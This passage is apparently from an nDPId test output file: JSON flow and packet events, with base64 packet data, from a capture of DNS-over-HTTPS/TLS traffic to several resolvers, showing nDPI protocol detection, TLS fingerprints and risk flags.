hpC\/tSOqvX1jgKKAZg82Jl+tqVLBoZ773\/7qHfr\/BAX6oJ0vKtNpEDEGeMy6jjr8KxmYOPhgJuUsXOSiQKReqTW0HLQJn9LpGUn4zKUgOBpUtJCVQOwstz8rJvV98lhrypc92o1bXoXeUIxGojGdQmZAgxriin+ux8aVQDWCuRuunDdKlwCqYBaBQ5f2rPbpDMmRJRFIQV93Nffpu5y2M2nD2zqfxShtHtZqK9Odguom6eKtfMYRNoP0\/G2utDI3qzWXA4Mjnq20qW6WLp3\/OACxfwxJs+mIIux4CN4Of382BKD+HUg6iVDD+mi+PZO8yXcm+iMHr94FuVjknbJgwr8pz8hnl6BJO7Py9BRIAZSwIskF6wOgI\/\/4Qr2JcZ3TwaII9SEN+0Sx8PMXXAKDv89DA4GNqNhV0hw6VXwyvbxpg4tI+badMBjtd\/o4XHqPH+BgFz6M8EMB4Jddticq89uWfyyGOVmNlx8K6oUYEdD6RJBEwIP6yYPzzeebCbDK3en7B16cFcus7h8285+5Wxpsa9ruV64Q9ZoEhEUMGgffnT5ajZ+UpmS77fDl+DfNEzJY8TjXm9EL8XAwMBGQ9SGwhaT+0AWTV1WADn36NruqoDTHdQXMB5KJVX+hyENZfYkPjY19bk0TmuSlxnW4sPXtcFmHvEzv8TYCgHXXFqdgaXEgdtFhRRSPS0CqywSlTwtg9zlqkP6Vu\/gi2jnM2lX\/S3paNkHLJK2Xs42G6p+yMmyRBfn14DEFDykxvC8z+scW1WMMiVZcbQBKhJ+Ek8WtRoS9WYaJ74jobV62XFVLje4Al6wOy0PssyggYMNCsvtsxQ5KXxmsj4du7sF6hIaLMWOz7O8LamYiEYnY4YByhzDbINOM3XB385ribm3TlBE2FwQhpCNmgQNjG7wIBC9IfEBLxv5rxwvF8PVckgsWpRxADmo+gltAb0\/tgSzKl\/30lZxZ8BFwMDADWhE8bE7ktzdpeT1iEQv9HPHLrjBcBDs9EHJnB16E0omVuS5qQqwxUOOBNAVfkBff92\/dyz\/Q=="}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310588,"flow_last_seen":946739310588,"flow_idle_time":7560000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739310588,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":946739310588,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":946739310588,"pkt":"REREREREZmZmZmZmCABFAAFGz7FAAL0GqFMKAAABp3LcfZKaAcWpCIgSh0x2XlAYAfZF5QAAFgMBARkBAAEVAwNM+6CQ4xrTV+1tOPP7h0Gj90S89M7DOPc8QQnDuq\/mRiD0eC9rhNsSjRzwJJQFthL\/q1ufnITsbP94aSBdrdhzDwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACmAAAAFQATAAAQZG5zMS5kbnNjcnlwdC5jYQAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACDUjoSgwC\/YwRC2sL4\/9W3ATSzLtM\/v84EfifaAhQZfWw=="}
01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310588,"flow_last_seen":946739310588,"flow_idle_time":7560000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739310588,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns1.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":946739310697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":3154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3154,"pkt_l4_len":3120,"thread_ts_msec":946739310697,"pkt":"ZmZmZmZmRERERERECABFAAxEyD9AADMGLsinctx9CgAAAQHFkpqHTHZeqQiJMFAYAfVQ4wAAFgMDAHoCAAB2AwOMlhGBzZbQdgMB7SlRRNR6aAHyhH11lUBOX85ujHC26yD0eC9rhNsSjRzwJJQFthL\/q1ufnITsbP94aSBdrdhzDxMBAAAuACsAAgMEADMAJAAdACBUUq246Yl+EWhWLEvZvcutMb+IirYuhEzXmLk3lr59QxQDAwABARcDAwAgZrqPXWP2zV85oWOqSEKZV0DzXUfiOwwJJ+C5CgZ1QqEXAwMKFVw16EKwmaYl6UqgM5FDRFEvQkVVdsBwborgCOxUvP2YbrJsHBMovDHHpAcBFTWebPQJMSKasadU094aHDRpLPrxxCjXB2pxM0WIqTvteHWIfU1Fk5\/NpqSuHKzO0Ra3PwdESYixe\/zb6sDdKKc1TRT99VsGnFNvwT\/9kRj6LGAVtWhnVsCfJH598qgWQ0wNsN5\/qg97535WjDSAoptbAHelOwuJgc8mZW87Z778lSdbGSJVYmbS+Kzpu3czloyo+k8tnMR0gAcl1hEQQ49kVF90oJqhnl11GE\/B0nhnrDcMC484Ni2gzPflOc2ve4l75Bv19quG6UuBjAJ+lAILT2sCAli3NgfXnu\/RIxYWHOwg5dkUsitPEbeddf7oCeQEhHZOIe8IWZHCTWJ8Xas6gq1DtDEctxSwxYTmBOPQYJURvi5XAJunxgkYorZ1S5H22PsJbPQoDTXE7jb\/MK+t+sJi\/qLBk\/QTcK+QjjpfOnPOG6kcTfb96PDiNmimFlhI+7qPbHOuBFKP3RlOfNCtE0LR80aRulQJ7mOKrhCqpMkFgCoXo\/4IvZulEfNa6rLjjxU0mGwRO9C\/8SUW\/MWxf9V+fhaFIFLLIrdk9mjlOAh4RTjBuIhZwdSm01OHFabvxJQc5nWUTI8sDv\/4Hth4Nmyyi395Zo\/bIgvPNsPA6YqSbJJPw7TRXj9EpeXABU58rfRMlnEHMcHSeAnr61+lHN29cf2rb7cQuEObxOV+r0Ti2hnTxG1kzZXxUKMf1TJz\/QNCPdFs\/8sc7I75BLceNNdyiMxbhvl0\/mQYkbbTX+E01I4nneSr0YAWi\/dj5OFWkY5oKdT3ijaj5ZnH8mUoUzF6gidtHrJfWLUutNNAVK0ii3hJTxAh53tLa55cziofBXUjER9OxqdXFQX0xk0dW5\/N25Am3sfN4K9G9Or+Mq0ZjCUN\/b\/4AAu5iVdc2xuiywbhKCKv\/+1ba649i2+11N2NuNP4WLerjRdmVgUEXTqjPsE1bvdPpgn\/tgD\/NfJO4snitGVo2fF0AIvoI8ffNDBM8mHNAe\/P4wCN21PuNzrXMiMwd7BKvHy1yaV3bx1ZcbZVsRq2ArQ\/sz1xvbYIM5K\/4uE3U5TUD7iEvNa+H0F0t5Pm3xl9hPFjB8UQZyCzE0eaHFxztuY1AhJrANiSpn9KUApux28hlfmPpxZwwY\/4voaTDNDh4a6l1L\/5bBlTMZQ8ZTPo3KsCc7rYoLRgUBfec4EVT3pXIcfZwnttUMEultj1OSOdAYKMUVl+Ae797PlHj+BPOvQU1JP+1NxmeW9EkPxvKNxTuFB8Ql03lSa0sP7N4iOT4LxwTyM6btUOuFjsDMq5fFh3z8x6u4eDmVvymYi2lDSt123i5VnAGlmqe2vlBnBoLSjRbpHHKNWC14LFSfaclke+Fsk\/LXqRdmrmwoK42FR8QM5yBJ4V4XBtfp1iJayJWXrv2Yp\/Jw2nGI\/8spJXweIKBfFJYNDE+FKqYVx6uY0QURwmsxmAiNbUSW3iE5ptj6f47Bqqzcu614k3woIktKLvq+R5kAUl\/94OeFfc1MDcYQiS1itHZ6WgYMqXlALhkIaagT341vLWH8EINXXu\/JPbuL4ratmRZsOHcAq4Z64Qth7VsN\/NAOgVmBZa9WLc6jmBs+\/7oNewv6pYbinaC9eFjw+AUviDZIoPDTI2cqHtCKNJKtQeYF8JwZdso+kGs0e4hY6Ekh+Gt4QIAdcddPMJiEMdHRRcI7TJwLsTmixFKIFFEmFMcRnAgRce970vQl6+J2m\/3\/zT76RlKTnb6S5cA2Gh1xVWfifqZ+dJJ4S6U8o2kzOx1BcO4lPr6QndhbLXBopt+TnAxhiNVC0jGSLxxKfJsKliuCmauybike5VfhMB74\/Zd9LI0lHZcyjtrJZpkqIdf9mUmq84TeFEVObpfDxeDp9pwfwnzY7CZiAhc8H7X\/B4eL6QPbJJeDvWRsaiMa8MtOGUovwBK\/1RmmRbBs9Ps\/WvCegAP2zZsifFoeWn3IFAPuF2t4F1jzP6KFB2fJjiCF\/xSMUdVX4mSSLxUy6Noq6HH8DTkiTT7i5Rtb6Z+6YPqTrIz0kRUJm8ymK8qGaWvXbafgJW+zAD6LQJ6Uz\/H9ede+fQeVaNdwR2ZGANN93T8+CUOO\/5QCgVylxvI+WkULYljrgmsAHGf2x4K+AdzUNCRbtqqamvoa9+H9TZ6D9K0XHtu60WRh\/xvg+0kvul3oISkBwW\/5VC47CJIkeqDKIcaH28dzjF68bVaWHBCOA\/QVspO8f7PM39uibr2ZI\/9qT7jw8Z+41laurnLDDiiTcv8nIyk9gPkkLpL0gZ8B7RwNepdi9poakmfyvLsu7noykkUZPrrciaDs4AxlMW2SE0l6ggoSXHblXDfGv1qrkJ+wYHqoIpx4Orz9BIDwmFuIK9uApDePCMMJ8COMRLP5+c7CWBbef3qNt43feI9i3DxrqohnnAeDQ5XayaaeIrWeswn\/yTkRhpCGBJsg0rlCy0bwelKJ5jOd0Z6yAeLdgeBTN7mANe1L7262l3N\/TUj4BGdpkUJSKWZ+F5L9xh3ZDx0CN7nut3setCOi4jALV8qZWBwNBsnPw\/1et9Mhz5yQU5W4hKDkIkR0JbpteXZI\/YulIUs304N95S0rMRs+F91Z\/I1bjxYITEBnA3nKgeOqnJG67UQeyBJy3Wot3ZWs1FnfHSinzEDRXoy\/in3NMk3Ee4UJjJJVvh1u1kB0flpae3nwu8yHniwAQeA4V\/IYlytwzxmH9UBxClJ1YaCH4QYvYTNNn4X5yrgDRFy8aRZbx7KFTZjETXMAwD7jXdzFpBRNyur7a5hxwjkpR1nPJHXNHbl9ulhBQraPk64O22lXmWhmTqqJxPCHLTJc8dCW9Tw+MWIDqlSC6iP\/uFGWMugMNTbPpm71YwCV6DE3MM5Iw3r\/pJtSMpVM1czkfmhYfe8YtiZEI64Bh59v3JQ7Geu6i4Q2THuBrvHiZucUzufDS6W\/DBGI9K4\/J9OjIx3bbp4KuEgDSz3alUQX8h9N3c6Ve\/ecJdJcy74VVi6oGyfaHP6IVk7S15X3oTFjfGBcG+hk0a0dR\/W0BGALH+pY8iH726JsGgeEg52jxxJyoyqN2BP+Onsb9VAjI4Axsa9MyFPMa6R4QE78VraMZsIMjQY2e6jOI2lFaIx1i29CS8IB7OY+l9i9GRSJhN1TC+qRidWiZdwiZ6CGxjzCAIjCNtYYMpt94CcLWARqfnvGVuwq7RqWOpW3L6qgDcGRhcwof3dXDPhz02YMhWNSauXVnUXZfqF8vmR+tgeJWIevQpdj5ioEIsT2Um5j+gijjHh859fJLDhzYVmYtQ3TEi737GfFw2SXnggL\/Iy07c7IZEI94AezYiyRdA9+kLWGaO\/dAL2rthXXz37bspZFnOGyuB0KI3G4RabCIXAwMBGcOMNM44BDplKj\/3Ojq4jdtuoD82NTa5b2k5zkFslQd12hFn3q5eB44nkwI465O8I9pSVocWpqU9EbYhTvyK1R8N4URD7Q5PMRg7Umy5tkS2hB9uZLmMl9DoKxlIW+kyr\/KuqeGrCAN583A5M1yhRuOwYF56CIKxvuyChPRKUAt8\/70gOTQjynH\/\/1nGoYgPF\/ta4eVsTLhuzDLb9mQMc16\/4VLa51E7HgIT9to4lg95nWvnMoIyp4a8sRcKKCYU92Ot4xWr0tqEIEu0fXIbk7\/Ta2loRt8FUwirJas4rlQGX1glaJy9RyPTHTwKV9kLdjGIRncOAxHu\/8Q7IfLg2aWJ07\/3naoyq6szJDQTcE3S8LB44P4jJ13NFwMDADUJ1y22teIy1dcIiwJwX4cS160nI55Nkh7bUzq2ftRXjrZxugVJnOhQTCokK54\/+GLzaYeqbw=="}
01090{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":74,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739310588,"flow_last_seen":946739310697,"flow_idle_time":7560000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3100,"flow_tot_l4_payload_len":3386,"flow_avg_l4_payload_len":1693,"midstream":1,"thread_ts_msec":946739310697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns1.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":946739310700,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739310700,"pkt":"REREREREZmZmZmZmCABFAABoz7NAAL0GqS8KAAABp3LcfZKaAcWpCIkwh0yCelAYAfVFBwAAFAMDAAEBFwMDADWIup5ey1m73Olzdr+La\/pgBsOV2156nE0gjo7pkVZbX+HWq3wNBOBZgTPS2Gv4V1H1NoVl6Q=="}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310980,"flow_last_seen":946739310980,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739310980,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":946739310980,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"thread_ts_msec":946739310980,"pkt":"REREREREZmZmZmZmCABFAAFBYCBAAL0GW60KAAABuSuHAZUqAburhCguMeSlTVAYAfYCHQAAFgMBARQBAAEQAwM7gJo4OG7S+iUgpLXTuxo5Xw1OBGj4DiyxVBvpcTjrrSC1ygzgmnU02BGfASVXjVBWPNfoJIqu28ODMXbR4UvXGQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAChAAAAEAAOAAALb2R2ci5uaWMuY3oABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg+HQ6d2TRAhXiPlV4SzYTTgVvyRFR0ttaRH8caXLPDAE="}
00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310980,"flow_last_seen":946739310980,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739310980,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"odvr.nic.cz","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":946739311016,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":3057,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3057,"pkt_l4_len":3023,"thread_ts_msec":946739311016,"pkt":"ZmZmZmZmRERERERECABFAAvj5XlAADUGU7K5K4cBCgAAAQG7lSox5KVNq4QpR1AYAO0MvwAAFgMDAGICAABeAwOYp2uqwk2kagwv1bFvuG7BP4gwxFJK\/HnbYlDDBgxtByBtkhDnIYlAH5FeNvmtcy43X+awJKk1khM1gLQ9O4\/1KcAvAAAW\/wEAAQAACwAEAwABAgAQAAUAAwJoMhYDAwn0CwAJ8AAJ7QAFUTCCBU0wggQ1oAMCAQICEgOvzNhD6HsqkMaua9kU943O+TANBgkqhkiG9w0BAQsFADBKMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5jcnlwdDEjMCEGA1UEAxMaTGV0J3MgRW5jcnlwdCBBdXRob3JpdHkgWDMwHhcNMjAwODAzMDY1MzUwWhcNMjAxMTAxMDY1MzUwWjAWMRQwEgYDVQQDEwtvZHZyLm5pYy5jejCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMSBtMaoOIrrVwbIP2cWYEJHSXjqgj\/\/9tkWX5PXpNopleDTdQVoDYtrhgWWdCxKvyghVnCCvqzpAdxH9iHJ+YDCJvMhSONvyUnQC+8wqGClBPGGgWuYJiWCNGWLq05jQxU5OjFamZYLeA83J41w0hXJ0caGVgR+ZmGHFjjdBCJABPqlSZbx4n\/8eqoqwv3W6903WKQrR8zszV5MtKKlTANB6QP2yhXI+UhhzdoeLxrEImAA6gxL2BOHWdKuBhBuV+ph8YRaL5IiMHVdXgcmxhPMtLDMaXcrlQWC6XO\/mVYjsQjycz9NHwfX9HBGmqdB8EpxpqAzOMv4Pfea+srqI+sCAwEAAaOCAl8wggJbMA4GA1UdDwEB\/wQEAwIFoDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwDAYDVR0TAQH\/BAIwADAdBgNVHQ4EFgQUiF81uRjtpDLZWzD7gWIvMHk\/TcYwHwYDVR0jBBgwFoAUqEpqYwR93brm0Tm3pkVl7\/Oo7KEwbwYIKwYBBQUHAQEEYzBhMC4GCCsGAQUFBzABhiJodHRwOi8vb2NzcC5pbnQteDMubGV0c2VuY3J5cHQub3JnMC8GCCsGAQUFBzAChiNodHRwOi8vY2VydC5pbnQteDMubGV0c2VuY3J5cHQub3JnLzAWBgNVHREEDzANggtvZHZyLm5pYy5jejBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQMGCisGAQQB1nkCBAIEgfQEgfEA7wB2AF6nc\/nfVsDntTZIfdBJ4DJ6kZoMhKESEoQYdZaBcUVYAAABc7NP+yAAAAQDAEcwRQIhAKJu6NqRyIYQsDPHU\/A2REhgeKHjM4x+XnuUUYMuSVKBAiBvFXWETRjBcg4jaK4iYqlFL3MxxHaFAihU4M5Y1\/QWIQB1AAe3XBvlfWj\/8bDGHSMVx7rmV3xXlLdq7rxhOhpp06IcAAABc7NP+0kAAAQDAEYwRAIgbhSITSEVzSp\/pS3dsOxVrCnCOPr0QsQS\/Z8OeZ0VJL4CIEqFJZjRYER6kq4HNRyZ4yzxaPbu\/njrCFn4rfkG\/MO7MA0GCSqGSIb3DQEBCwUAA4IBAQCGEOIQRUNcWjsX719Aj278yDJZeRktrpYQiEzTApT2VFFAVk9RNpDtIgove0nygMmo0gYcRhVp8veJjqVoyBOpTj8fBZ0k4jHFaDhaRBi5aQXOMln+cU\/N+ZZyxOF\/OvhfMIgmGnNpnX15fmj0DD6pQOeMMvjd9\/6LhaAOIYehc8T\/qnYYgS+NN4PGwZ62L8NBcloKk78UBZkehMmgkPB4R4UGWU+P\/9wBXoct8xHeSEI\/RKypAvQONIxcx+PGOfY7cug8EawYjQxeC0dBrCPA4HuTbflrjLpxCEjs2nsPD4SXJGGl7AoG4paGMGZjt4DcZO2jhWz5unIehkjqEM\/fAASWMIIEkjCCA3qgAwIBAgIQCgFBQgAAAVOFc2oLheynCDANBgkqhkiG9w0BAQsFADA\/MSQwIgYDVQQKExtEaWdpdGFsIFNpZ25hdHVyZSBUcnVzdCBDby4xFzAVBgNVBAMTDkRTVCBSb290IENBIFgzMB4XDTE2MDMxNzE2NDA0NloXDTIxMDMxNzE2NDA0NlowSjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUxldCdzIEVuY3J5cHQxIzAhBgNVBAMTGkxldCdzIEVuY3J5cHQgQXV0aG9yaXR5IFgzMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnNMM8FrlLke3cl03g7NoYzDq1zUmGSXhvb418XCSL7e4S0EFq6meNQhY7LEqxGiHC6PjdeTm86dicbp5gWAf15Gan\/PQeGdxyGkOlZHP\/uaZ6WA8SMx+yk13EiSdRxta67nsHjcAHJyse6cF6s5K671B5TaYucv9bTyWaN8jKkKQDIZ0Z8h\/pZq4UmEUEz9l6YKHy9v6Dlb2honzhT+Xhq+w3Brvaw2VFn3EK6BlspkENnWAa6xK8xuQSXgvopZPKiAlKQTGdMDQMc2PMTiVFrqoM7hD8bEfwzB\/onkxEz0tNvjj\/PIzark5McWvxI0NHWQWM6r6hCm21AvA2H3DkwIDAQABo4IBfTCCAXkwEgYDVR0TAQH\/BAgwBgEB\/wIBADAOBgNVHQ8BAf8EBAMCAYYwfwYIKwYBBQUHAQEEczBxMDIGCCsGAQUFBzABhiZodHRwOi8vaXNyZy50cnVzdGlkLm9jc3AuaWRlbnRydXN0LmNvbTA7BggrBgEFBQcwAoYvaHR0cDovL2FwcHMuaWRlbnRydXN0LmNvbS9yb290cy9kc3Ryb290Y2F4My5wN2MwHwYDVR0jBBgwFoAUxKexpHsscfrb4UuQdf\/EFWCFiRAwVAYDVR0gBE0wSzAIBgZngQwBAgEwPwYLKwYBBAGC3xMBAQEwMDAuBggrBgEFBQcCARYiaHR0cDovL2Nwcy5yb290LXgxLmxldHNlbmNyeXB0Lm9yZzA8BgNVHR8ENTAzMDGgL6AthitodHRwOi8vY3JsLmlkZW50cnVzdC5jb20vRFNUUk9PVENBWDNDUkwuY3JsMB0GA1UdDgQWBBSoSmpjBH3duubRObemRWXv86jsoTANBgkqhkiG9w0BAQsFAAOCAQEA3TPXEfNjWDjdGBX7CVW+dla5cEilaUcne8IkCJLxWh9KEik3JHRRHGJouM2VcGfl96S8TihRzZvoroed6ti6WqEBmtzw3Wodatg+VyOeph4EYpr\/1wXKtx8\/wApIvJSwtmVi4MFU5aMqrSDE6ea73Mj2tcMyo5jMd6jmeWUHK8so\/joWUoHOUgwuX4Po1QYz+3dszkDqMp4fklxBwXRsW10KXzPMTZ+sOPAveyxindmjkW8lGy+QsRlGPfZ+G6Z6h7mjem0Y+iWlkYcV4PIWL1iwBi8saCbGS5jN2p8M+X+Q7UNKEkROb3N6KOqkqm57TH2H3eDJAkSnh6\/DNFu0QhYDAwFNDAABSQMAF0EE7OwduzycCFyh5foVYUYJfj2csLLoqbmNrs4ksDiqkMaHC2NulFxfST4jcCRZ19YEaLojL5JVRvlluRb8LA6yDQQBAQARbpzNdpCTfHNn9Bz14lNKRHZrsXa4X4EmfyVVEagU6WSCW5UKp3bMis8UAzosg4RFbcIE\/BqKgmQG64Bt\/cGitnxq47bonIC\/OFLylrM320R6R6uLkQuGNQpkUlgrZKL\/+YkYqd4ToLlZjenqQeguYlPWOUvDEduCfvOd+A9y2fcGuSyrbb0En99qwYiK1PUm11WXjEDQ91vzKm5Pz2wWWFYuywvRbHOtLetuqGEfMtz5QTTP+GA2fJf1SHhqAtT7v7XaP+5Wvee65IgIoNU6aiAVYz3hwW\/AkDmTqCcqZ608Q7A+R1MIFZgfnWqkxiaXPHcpFh\/8pcgjckhLtTiSFgMDAAQOAAAA"}
01283{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":92,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739310980,"flow_last_seen":946739311016,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":3003,"flow_tot_l4_payload_len":3284,"flow_avg_l4_payload_len":1642,"midstream":1,"thread_ts_msec":946739311016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"odvr.nic.cz","server_names":"odvr.nic.cz","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=odvr.nic.cz","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"15:57:4E:06:5B:3D:23:22:EF:BC:2E:5B:A3:3E:A5:76:BD:14:01:4B"}}
00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":946739311048,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":180,"pkt_l4_len":146,"thread_ts_msec":946739311048,"pkt":"REREREREZmZmZmZmCABFAACmYCJAAL0GXEYKAAABuSuHAZUqAburhClHMeSxCFAYAfUBggAAFgMDAEYQAABCQQS+L1tdhkv27psDloITDJmmm+nkuKGJ6kBYeGBEdwUOSK4polbbfA55gXHwNtK3Y1Aq1CUhl++X\/zqhOD+IGqi8FAMDAAEBFgMDACgAAAAAAAAAALayQyzNIxhtoOFefQYzbs\/rDW3NZGb\/HW2xO7qHfaVY"}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311335,"flow_last_seen":946739311335,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311335,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
